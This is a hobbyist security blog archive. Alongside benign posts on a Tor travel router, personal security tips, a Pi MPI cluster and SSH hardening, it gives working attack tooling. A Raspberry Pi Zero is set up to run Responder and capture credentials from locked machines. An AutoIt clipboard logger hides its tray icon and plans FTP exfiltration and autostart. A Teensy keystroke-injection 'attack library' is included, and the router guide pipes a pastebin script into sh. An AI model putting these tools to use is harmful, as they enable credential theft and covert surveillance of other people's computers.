UPDATE: We are selling these Tor Privacy routers

We are selling these #privacy #torbox routers for CA$35 + shipping. Message me if you are interested.
Paypal:    cmaj(at)byteseclabs.com
Bitcoin    156SLTpHjWRkLhkgz8mRNmbbwxuERZ3irY
You can DIY too https://goo.gl/OOw7Ig

User manual

Make a cheap TOR anonymizer

I had a few friends ask if they could buy a cheap travel router that protects their internet activity as they travel around the globe. So my criteria:

  1. Cheap (<$20.00)
  2. Portable (ideally pocket size)

I knew I wanted a little travel router that supports OpenWRT and has enough RAM and storage to install TOR. There were a few routers that I liked but the NEXX WT3020H. There are a couple models that look the same. except for the "A" model all the other ones are the same. Don't get the A model it does not have enough resources to run Luci & TOR. Pictures below are for my WT3020H. I purchased mine from Aliexpress link

There are a few getting started articles online that explain how to install OpenWRT on this device and how to install TOR. Everything i seen so far is incomplete. It either allows for DNS leaks or don't allow .onion URLs. This is why I wanted to write this post and help anyone else that is trying to do the same. The script is agnostic of the hardware so should be able to install on other OpenWRT devices.

Installing OpenWRT Chaos Calmer on the device

Connect your computer to the LAN port on the device and follow along:

$ telnet 192.168.8.1
Trying 192.168.8.1...
Connected to 192.168.8.1.
Escape character is '^]'.

(none) login: nexxadmin
Password: y1n2inc.com0755

BusyBox v1.12.1 (2016-11-14 18:04:51 HKT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cd /tmp
# wget http://downloads.openwrt.org/chaos_calmer/15.05/ramips/mt7620/openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin
Connecting to downloads.openwrt.org (78.24.191.177:80)
openwrt-15.05-ramips 100% |*******************************| 3328k 00:00:00 ETA
# mtd_write -r write openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin mtd3
Unlocking mtd3 ...
Writing from openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin to mtd3 ... [e]
#reboot

The device should reboot and at this point you should be running OpenWRT 15.05. Release renew your computer's DHCP lease. Ensure you have an IP in the range of 192.168.0.0/24 (probably 192.168.0.100).

$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to openwrt.lan.
Escape character is '^]'.
=== IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH
------------------------------------------

BusyBox v1.23.2 (2016-11-14 03:03:02 CEST) built-in shell (ash)

-----------------------------------------------------
CHAOS CALMER (15.05, r46767)
-----------------------------------------------------
* 1 1/2 oz Gin Shake with a glassful
* 1/4 oz Triple Sec of broken ice and pour
* 3/4 oz Lime Juice unstrained into a goblet.
* 1 1/2 oz Orange Juice
* 1 tsp. Grenadine Syrup
-----------------------------------------------------
[email protected]:/# passwd
Changing password for root
New password: 
Retype password: 
Password for root changed by root
[email protected]:/#

Installing TOR and configuring IPTABLE

SSH in to your device and complete the steps below:

$ ssh [email protected]
$ wget http://pastebin.com/raw/Yd5mXksr
$ mv Yd5mXksr setup.sh
$ sh ./setup.sh 
$ reboot

After the device reboots login to Luci (http://192.168.1.1).

  1. Browse to Network -> Interfaces
  2. Click the "Edit" button for "LAN"
  3. Scroll down to the "DHCP Server" section and click on "Advanced Settings"
  4. Add an entry to "DHCP-Options "6,1.2.3.4" (without the quotes)
  5. Click Save and Apply (may take a couple of minutes)
  6. Reboot the router.

That's all the device will now intercept any TCP traffic and UDP DNS traffic on the LAN interface and route it through TOR. Making eves dropping impossible.

Please let me know what your thoughts are and if you have any questions. The script will be on http://pastebin.com/Yd5mXksr. Spend the $20 stay secure :)

Snagging creds from locked machines with RaspberryPi Zero

I get really excited anytime I get to use my RaspberryPi Zero. When I saw Rob Fuller's Tweet this morning (@mubix) i got really excited. Coincidentally I have a thing for single board computers and been playing with the USB Gadget mode for the Pi Zero last couple of weeks. As soon as I saw the tweet i knew i have to do this with the Pi Zero.

Requirements:

  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD Card. I went with the Raspbian-lite version its better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone https://github.com/spiderlabs/responder

Edit /etc/network/interfaces

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static
address 192.168.2.201
netmask 255.255.255.0
gateway 192.168.2.1

Configure DHCPD Settings: /etc/dhcp/dhcpd.conf

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.1 192.168.2.2;
option routers 192.168.2.201;
option local-proxy-config "http://192.168.2.201/wpad.dat";
}

Edit /etc/rc.local

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
/usr/sbin/dhcpd
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

Create the configuration file for screen

sudo su; nano ~/.screenrc and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed shutdown the Pi Zero (shutdown -h now) and remove the Micro SD Card. Connect the Micro SD card to your computer. We need to modify config.txt and cmdline.txt to turn the OTG port to a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016

Edit config.txt

Add this after the last line:

dtoverlay=dwc2

Edit cmdline.txt

After rootwait (the last word on the first line) add a space and then 

modules-load=dwc2,g_ether

 

Safely eject the Micro SD Card. Put it back in the Pi Zero. The device is ready use the USB OTG cable to connect it to the PC and Happy Hacking !

TOP 5: Personal Security Tips

I have been working in a Systems Administrator role for over 10 years and I am asked constantly by home users and peers at work on how to secure infrastructure and how to monitor effectively. One of the biggest issues with securing infrastructure is to identify potential attack vectors and to run risk analysis scenarios. Unfortunately this also means understanding who is trying to attack you or your business and whats in it for them.

I would like to start of with securing your personal infrastructure, and later show how this ties in with securing your business. The biggest reason for personal attack is identity theft.  Let's face it, money is the biggest motivation for this industry. Building a bot-net or zombie network is another reason why evil doers want to have control over your system(s). They want your compute power and they need your bandwidth to launch DDOS attacks against services. The world we live in, these types of attacks are orchestrated by two distinct groups:

  1. Identity Theft ==> Organized crime syndicates , family and friends
  2. Bot net ==> Spammers, Hacktivists, Script kiddies and organized crime syndicates

Now that we have identified the two most common type of personal attacks, let's see what we can do to secure ourselves.  I should point out a couple of things before we get to the nitty gritty of things:

  1. Paranoia is good. The consensus among people like us is to keep an open mind but question everything.
  2. If you make it difficult for attackers, they will quickly move along to the next unsuspecting victim.

Now that I got this off my chest, let's see what we can do in our personal lives to stay secure. I titled this article "TOP 5" so I will highlight the top five tips for personal security:

  1. Do not use the same password everywhere. Use different passwords for every service you use online, your home WiFi, your email, your password to log in to your computer, etc. Do not use simple passwords, passwords less than 8 character, or dictionary words. Instead use complex 9+ character passwords with numbers, upper, lower case characters, and special characters like ,!@# etc. Try to use 2 factor authentication for services that offer it (Google, Facebook, Microsoft, Twitter, and many more). If you are thinking this is insane and how can I memorize such passwords you are thinking along the right path. Passwords that are easy to remember are easy to hack. Instead, use an application like Keepass or Password Safe to track your passwords. Keepass works on Windows, Linux, Mac OS and smartphones, and I use it for storing my passwords.
  2. Do not use pirated software. The issue with pirated software is that almost 99.9999% of the time the software is tampered with to allow you to use it by bypassing the activation / security in place to prevent unauthorized usage. What you almost never know is what is actually changed. We notice that application downloaded from shady websites may include malware that installs along with the software giving the attacker persistent access to your system. We have noticed this trend in the industry over and over again. Root kits embedded with applications downloaded from torrents. Here is a link for such an attack from 2011 ago to show that this is not a new trend. Another issue with cracked software is that it cannot be updated, leaving you stuck with an old, vulnerable version, and waiting to tempt fate.
  3. Regularly update your system and run a good antivirus software. Enterprises patch vulnerabilities in their system.  This is a cyclical process, and patches are created as vulnerabilities are discovered. The problem with running old software is that there is a very good chance that your system has a vulnerability and that there is an active exploit out there that is being used by evil-doers to gain access. If you like to wait before patching, prioritizing what to patch is a good idea too. Web browsers, plugins (flash, java. acrobat reader) are usually the most attacked software. If you like visiting questionable sites, or get emails from unknown people with attachments, use a sandboxed environment for your day to day stuff. Sandboxie is a great application that does this. If you use a professional antivirus solution, like Avast, it comes with this option built in. Also, please keep your firewall turned on. Firewalls were designed for a good reason, and they act as the first line of defense against online threats.
  4. Backup your systems regularly. We are starting to see an increasing growth of "Ransom Ware".  This is a new type of malware that holds your personal data hostage, and unless you pay, they won't provide you with the keys to decrypt your data. If you have regular backups, then you can easily restore the data from the backup. Both Windows and Mac OS have great backup solutions that are baked into the operating system for free. This way, if you have hardware damage and/or malware destroys your files, you can get your data back without breaking a sweat or your bank account. If you prefer to get a 3rd party solution for backup, there are professional solutions from companies like Acronis that can provide reliable solutions.
  5. If you've implemented points 1-4, you are already doing a good job of staying secure just Don't get social engineered and give up your data to strangers. This is one of the most important issues with security: the human factor. Be careful of what you post on social media, and be careful of what information you give out to people. If you tell everyone that your first pet's name was "fluffy" and your security question to your favorite mail service is what is your first pet's name? then it does not matter how secure your password is, it will be easy to reset it and take over your email service. This also means, if this email was used to signup for other services, those services are then getting owned by the attacker. I will leave this tip up for your imagination but this is why paranoia is a good friend. Question everything and be very careful about the information you give out freely. I want to add, avoid using open WiFi, or at least use a VPN connection when surfing from an open WiFi hotspot.

 Please let me know what you think in the comments below. If you disagree, I would love to see some feedback and constructive criticism as I prepare for the TOP 5: Enterprise Security Tips.

8 Node +1 Master: RaspberryPi Cluster running MPI and crunching numbers...

My quest for learning and building parallelism turned a new page. I mustered the courage to build a Raspberry Pi MPI cluster to test and code MPI. Couple of my friends at the Uiniversity of Alberta have been running MPI based code to crunch fluid dynamics problems. My goal was to build a farm of CPUs I can dedicate to do #STUFF at a very cheap price point.
 

Objectives:

 

  1. Has to be affordable
  2. Has to look presentable

Parts List:


 

  1. 9 x Raspberry Pi from www.element14.com
  2. 9 x 8GB Class 10 SD Cards (local computer store)
  3. 5V 12A, 60W PSU
  4. 18 x Female to Female jumper cables
  5. 18 x header pins
  6. 1 x PCB, 1 x 440uF capacitor, 1 x 220 & 1 x LED
  7. 16 Port 10/100 MB switch (had one available)
  8. 10 x CAT 5 patch cables

 

IMG_20131124_181847.jpg

 

I used my 3D printer to print these frames I found on Thingiverse.

 

DSCN0230_preview_featured.jpg

I used PLA and the finished product looked quite nice. took about 2 hours to print 4 frames. After about 5 hours I had the bottom and the top pieces printed. I also started installing Raspbian on the 9 SD cards. I used Win32DiskImager on a Windows 7 machine to create the SD cards. I started inserting the Pi(s) into the bottom pieces and then realized the biggest issue with this concept will be delivering power to the PIs. So I decided to build my own. The PIs draw about 450mA - 550mA depending on CPU load. with 9 of them I needed a PSU that can provide at least 5.5 A to be safe. I soon realized that when these PIs power on they can draw upto 700mA. So I purchased a 5V 12A switching PSU from my local store and built a simple power distribution circuit.



rpi-pdu.jpg


The dip switches can turn the PIs on or off. The main purpose of the 220uF capacitor is to smooth out the voltage probably not required. The red LED tell me that the PSU is ON and supplying power. I built 2 of these. was trying out couple different designs. The used the female jumpers to power the PIs.




2013-11-16 21.02.35.jpg


Once the PIs were powered up I SSHed into them and used "sudo raspi-config" to configure the CPU to run at 800MHz, gpu ram to 16MB and expanded the image to utilize 8GB. I could feel my goal getting close to completion with every key stroke. I wrote a little shell script to automate the MPI installation and configuration. Its not 100% automated but close enough:


apt-get update && apt-get upgrade -y
sudo apt-get install gfortran -y
mkdir mpi_install
cd mpi_install
wget http://www.mcs.anl.gov/research/projects/mpich2/downloads/tarballs/1.4.1p1/mpich2-1.4.1p1.tar.gz
tar xfz mpich2-1.4.1p1.tar.gz
cd mpich2-1.4.1p1
./configure && make && sudo make install
echo "Please answer the following questions to continue:"
wget https://github.com/downloads/philleonard/MPICH2-Armel-Raspberry-Pi/install.py
sudo python install.py

And that was it. My MPI cluster is ready. Since then I have run several example codes. Yes including the calculate the digits of PI.


I will post more with code examples and performance review as soon as get some more time. Till then Happy Hacking.

Source: http://asysadminsblog.blogspot.com

Secure SSH with 2 Factor Authentication

Disclaimer:

  1. This article applies to Debian based Linux and Ubuntu variants
  2. Does not work if the user's home drive is encrypted

Getting started:

I will be demonstrating how to use the Google authenticator PAM module for 2 factor. Google uses a time based OPT algorithm and it does not phone home to work. You will need an Android or iOS device with the Google Authenticator app installed. 

Install the Google authentication module by opening terminal and typing in:

sudo apt-get install libpam-google-authenticator

Generate Autehntication Key by running this command:

google-authenticator

Follow the instructions to generate a key by pressing "y". Copy the secret key, the verification code and the scratch codes and store it securely. Scan the bar code from the app on your phone to initialize the code. Please note at this point we have installed the module and generated a key only. We still have to enable the PAM for SSH login manually. The steps below updates the "pam.d" config file to allow "pam_google_authenticator.so" and "sshd_config" to set "ChallengeResponseAuthentication yes" and then restarts the SSH service.

Open pam.d/ssh with vi or nano:   

sudo nano /etc/pam.d/sshd and add the line

"auth required pam_google_authenticator.so"

Open sshd_config and locate ChallengeResponseAuthentication line, and edit it to say:

sudo nano /etc/ssh/sshd_config
"ChallengeResponseAuthentication yes"

Restart SSH service:

sudo service ssh restart

Next time you SSH in you will be  prompted for your password and the OTP before you are authenticated.

SSH Tunnelling & Secure Browsing: Part III

ssh -D 8080:localhost

This time I will go over setting up SSH client in Linux, setting up key pairs and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:

 

Read More

SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I. You should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-installer.exe and install it.PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method being the most secure if implemented properly. Once Putty is installed it should have created an icon on your desktop. Open Putty and you will see the screen below:

Default PuTTY Screen

Fill up the fields as necessary Host Name: [username]@[server name]|[IP address] Port: The default port is 22 *** Connection type: SSH Saved Sessions: [Any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left scroll all the way up and click "Session"and then click "Save" to save changes to the configuration. Click "Open" to launch the connection PuTTY will prompt that the Key is not recognized if this is the first time you are connecting. Click Yes to save the key in registry. I will go over key verification in another post. You will be prompted for your password at this stage. Please type it to complete the process. Once in open your browser of choice change the Proxy settings to SOCKSv5 Server / IP = 127.0.0.1, Port: 8090 and you will be tunneling traffic like 1337.

Part III will cover setting up SSH client in Linux, Public / Private key based encryption  in Linux and Windows. Hope you enjoyed, please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet is not secure and there is a need for secure browsing. There are many ways to achieve this and Obfuscate the traffic for eavesdroppers and protect ourselves against Man In The Middle (MITM) attack. After trying a few different solutions like torProject, Hotspot Shield and a few others like it I decided to set up my own SSH Server so that I can create a secure tunnel between my laptop and the SSH server and use that as a SOCKSv5 proxy. If you are still interested I will try to cover the following topics over the next few days:
  1. Install and configure a SSH Server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure SSH client (PuTTY) in windows
  5. Create Public and Private keys for authentication
  6. Set up Password-less login.
I wanted to point out that FreeBSD is really stable and uses very little resources to run and is my server of choice. I have tested the same with Debian 6.0.4 and works just as good. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you the best performance over hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine Guest VM Configuration
  2. Save and Power On. VM should boot from DVD press Enter to continue.
  3. Play this video for actual installation step

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add user to "wheel" group so that user can invoke "SU -"

FreeBSD Account Setup

  •  Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key

KeyRegenerationInterval 1h ServerKeyBits 1024 LoginGraceTime 2m PermitRootLogin no #StrictModes yes PubkeyAuthentication yes AuthorizedKeysFile    %h/.ssh/authorized_keys # Change to NO to enable built-in password authentication. PasswordAuthentication yes PermitEmptyPasswords no UsePAM no AllowAgentForwarding yes AllowTcpForwarding yes GatewayPorts yes X11Forwarding yes X11DisplayOffset 10 X11UseLocalhost yes PrintLastLog yes TCPKeepAlive yes PermitTunnel yes # override default of no subsystems Subsystem    sftp    /usr/libexec/sftp-server

  • Quit and Write changes
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

man ssh for better understanding of sshd_config

Part II will cover setting up putty in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an Executable approximately 300KB that will run on your computer logging clip board data to a text file in  %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0



#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>


While 1
$Clippy = _ClipBoard_GetData()
if $Clippy <> "0" Then
if $Clippy <> $txtClipboard Then
_FileWriteLog(@UserProfileDir & "\ClipLog.log",$Clippy)
EndIf
EndIf
$txtClipboard=$Clippy
Sleep(100)
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally Completed building the n3onli8.h teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys Enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
Keyboard.set_key1(KEY_PRINTSCREEN);
Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_V);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.

Creating the attack Library... "n3onli8.h"

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_DELETE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
}

void StartRUN()
{
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
delay(1500);

Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_key1(KEY_BACKSPACE);
Keyboard.send_now();
delay(100);

Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}

void Enter()
{
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}

/*
Check out @pastebin n3onli8.cpp http://pastebin.com/Q5bkU1t8
n3onli8.h http://pastebin.com/trrtYdec
save the .h and .cpp file in a folder called n3onli8 in arduino-0022\arduino-0022\libraries\
please note the numbers may vary with your version of Arduino SDK

Send me your ideas on library functions.
*/

Teensy Hacker ++

Earlier this year at Defcon I got introduced to the world of exploiting (HID) human interface devices. At first I was wowed by the simplicity of the attack. I could not wait to get my hands on my first Teensy from www.pjrc.com.
Initial issues with the board:
  1. Comes with Mini - USB connector. (Creates suspicion, USB drive looks like a tool)
  2. Not enough on board memory to carry payload.
  3. On first run depending on the system its being plugged into there could be a fair bit of delay for the drivers to initialize which means the code may start executing before the keyboard is ready and the exploit is a FAIL!
Initial usage for Teensy:
  1. Prank tool: Mess with Desktop, random key strokes...You get the point
  2. Copy files from "Desktop" or "My Documents" to ftp
  3. Use power shell to wreck havoc!

Next Post: I will be putting up some code for the Teensy...